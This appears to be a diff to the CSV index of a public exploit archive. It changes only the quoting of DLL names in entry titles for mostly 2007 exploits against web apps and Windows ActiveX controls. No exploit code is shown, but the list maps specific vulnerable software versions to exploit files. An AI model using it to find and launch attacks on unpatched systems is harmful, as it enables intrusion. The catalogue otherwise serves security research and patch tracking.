4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0 @@ -3771,11 +3771,11 @@ id,file,description,date,author,platform,type,port 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer - SMIL wallclock Stack Overflow (PoC)",2007-06-27,axis,windows,dos,0 -4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0 +4119,platforms/windows/remote/4119.html,"HP Digital Imaging 'hpqxml.dll 2.0.0.133' - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0 4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)",2007-06-27,str0ke,windows,dos,0 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name (PoC)",2007-06-27,ZhenHan.Liu,windows,dos,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0 -4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - (AmxVnc.dll 1.0.13.0) Buffer Overflow",2007-06-28,rgod,windows,remote,0 +4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - 'AmxVnc.dll 1.0.13.0' Buffer Overflow",2007-06-28,rgod,windows,remote,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0 4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0 4126,platforms/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow (PoC)",2007-06-29,r0ut3r,windows,dos,0 @@ -3807,7 +3807,7 @@ id,file,description,date,author,platform,type,port 4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote Overwrite (SEH)",2007-07-06,h07,windows,remote,0 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 -4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 +4155,platforms/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0 @@ -3818,20 +3818,20 @@ id,file,description,date,author,platform,type,port 4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 4164,platforms/php/webapps/4164.txt,"Aigaion 1.3.3 - (topic topic_id) SQL Injection",2007-07-09,CypherXero,php,webapps,0 -4165,platforms/windows/local/4165.c,"WinPcap 4.0 - NPF.SYS Privilege Elevation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local,0 +4165,platforms/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Privilege Elevation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local,0 4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - (inferno.php) SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - (index.php id) SQL Injection",2007-07-10,CypherXero,php,webapps,0 4168,platforms/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,windows,dos,0 4169,platforms/php/webapps/4169.txt,"FlashBB 1.1.8 - (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 -4170,platforms/windows/remote/4170.html,"Program Checker - (sasatl.dll 1.5.0.531) JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 +4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service",2007-07-12,shinnai,multiple,dos,0 -4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 -4177,platforms/windows/remote/4177.html,"Program Checker - (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 -4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - symtdi.sys Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0 +4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 +4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 +4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0 4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service",2007-07-14,shinnai,multiple,dos,0 @@ -3860,13 +3860,13 @@ id,file,description,date,author,platform,type,port 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0 4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 4207,platforms/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow",2007-07-20,"dmc and prdelka",windows,remote,143 -4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX - (actrpt2.dll 2.5) Insecure Method",2007-07-21,shinnai,windows,remote,0 +4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX - 'actrpt2.dll 2.5' Insecure Method",2007-07-21,shinnai,windows,remote,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired - 'index.php newsID' SQL Injection",2007-07-22,g00ns,php,webapps,0 -4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote Buffer Overflow",2007-07-23,shinnai,windows,remote,0 +4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow",2007-07-24,"Jared DeMott",windows,remote,0 @@ -3879,7 +3879,7 @@ id,file,description,date,author,platform,type,port 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0 4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 -4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 +4227,platforms/windows/dos/4227.php,"PHP - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143 40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 @@ -3893,11 +3893,11 @@ id,file,description,date,author,platform,type,port 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution",2007-07-27,h07,windows,remote,0 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0 -4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 +4240,platforms/windows/remote/4240.html,"VMware 'IntraProcessLogging.dll' 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow",2007-07-29,vade79,linux,remote,80 -4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution",2007-07-29,callAX,windows,remote,0 +4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - 'vielib.dll 2.2.5.42958' Remode Code Execution",2007-07-29,callAX,windows,remote,0 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution",2007-07-30,callAX,windows,remote,0 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,windows,remote,3050 @@ -3908,7 +3908,7 @@ id,file,description,date,author,platform,type,port 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0 4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,php,webapps,0 -4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - (CkString.dll 1.1) SaveToFile() Insecure Method",2007-08-05,shinnai,windows,remote,0 +4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - 'CkString.dll 1.1' SaveToFile() Insecure Method",2007-08-05,shinnai,windows,remote,0 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0 4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 @@ -3970,18 +3970,18 @@ id,file,description,date,author,platform,type,port 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 -4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 -4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow",2007-08-27,boecke,windows,dos,0 +4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 +4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 -4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 (nvUnifiedControl.dll 1.1.45.0) - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 -4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - SaveXMLFile() Insecure Method",2007-08-27,shinnai,windows,remote,0 -4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - DeleteXMLFile() Insecure Method",2007-08-27,shinnai,windows,remote,0 +4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 +4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - SaveXMLFile() Insecure Method",2007-08-27,shinnai,windows,remote,0 +4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - DeleteXMLFile() Insecure Method",2007-08-27,shinnai,windows,remote,0 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Privilege Escalation",2007-08-27,Inphex,windows,local,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps,0 4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection",2007-08-27,D4m14n,php,webapps,0 -4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 - / Quiksoft EasyMail (emsmtp.dll 6.0.1) Buffer Overflow",2007-08-28,rgod,windows,remote,0 +4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 - / Quiksoft EasyMail 'emsmtp.dll 6.0.1' Buffer Overflow",2007-08-28,rgod,windows,remote,0 4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - (revert-content.php) SQL Injection",2007-08-28,"not sec group",php,webapps,0 4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - (aid/catid) SQL Injection",2007-08-28,SmOk3,php,webapps,0 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - (viewitem.php ItemID) Blind SQL Injection",2007-08-28,irvian,php,webapps,0 @@ -3998,13 +3998,13 @@ id,file,description,date,author,platform,type,port 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0 4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 -4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 +4345,platforms/windows/local/4345.c,"Norman Virus Control - 'nvcoaft51.sys' ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0 -4348,platforms/windows/remote/4348.c,"PPStream - (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0 +4348,platforms/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0 -4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - (YVerInfo.dll 2007.8.27.1) ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0 +4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 @@ -4019,16 +4019,16 @@ id,file,description,date,author,platform,type,port 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - (DB_adodb.class.php) Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0 4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (Environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 -4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - glItemCom.dll SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0 -4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - eng50.dll Remote Stack Overflow",2007-09-06,devcode,windows,remote,0 +4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0 +4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote,0 4368,platforms/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - (FPOLE.OCX 6.0.8450.0) - Remote (PoC)",2007-09-06,shinnai,windows,dos,0 4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - (start.php) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - (index.php dlid) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 -4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - glitemflat.dll SetClientInfo() Heap Overflow",2007-09-07,void,windows,remote,0 +4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll' SetClientInfo() Heap Overflow",2007-09-07,void,windows,remote,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0 4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,php,webapps,0 -4375,platforms/windows/dos/4375.txt,"BaoFeng2 - mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 +4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injections",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",php,webapps,0 4378,platforms/php/webapps/4378.htm,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 @@ -4041,13 +4041,13 @@ id,file,description,date,author,platform,type,port 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download",2007-09-10,k-one,php,webapps,0 4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0 -4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - (CryptoX.dll 2.0) SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0 -4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - (CryptoX.dll 2.0) Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 +4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0 +4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0 4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 -4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.dll 1.0.0.0) File Overwrite",2007-09-11,shinnai,windows,remote,0 +4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - 'VBTOVSI.dll 1.0.0.0' File Overwrite",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 @@ -4061,7 +4061,7 @@ id,file,description,date,author,platform,type,port 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0 4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - (index.php id) SQL Injection",2007-09-14,s4mi,php,webapps,0 -4409,platforms/windows/dos/4409.html,"HP ActiveX - (hpqutil.dll ListFiles hpqutil.dll) Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0 +4409,platforms/windows/dos/4409.html,"HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0 4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post' SQL Injection",2007-09-14,s0cratex,php,webapps,0 4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,php,webapps,0 @@ -4097,7 +4097,7 @@ id,file,description,date,author,platform,type,port 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 -4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - (emprint.dll 6.0.1.0) Buffer Overflow",2007-09-23,rgod,windows,remote,0 +4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Buffer Overflow",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps,0 4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 @@ -4105,13 +4105,13 @@ id,file,description,date,author,platform,type,port 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion",2007-09-24,BiNgZa,php,webapps,0 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",windows,remote,0 -4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.dll 2.0) Multiple Remote Vulnerabilities",2007-09-24,shinnai,windows,remote,0 +4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - 'EBCRYPT.dll 2.0' Multiple Remote Vulnerabilities",2007-09-24,shinnai,windows,remote,0 4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0 -4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - (catId) SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 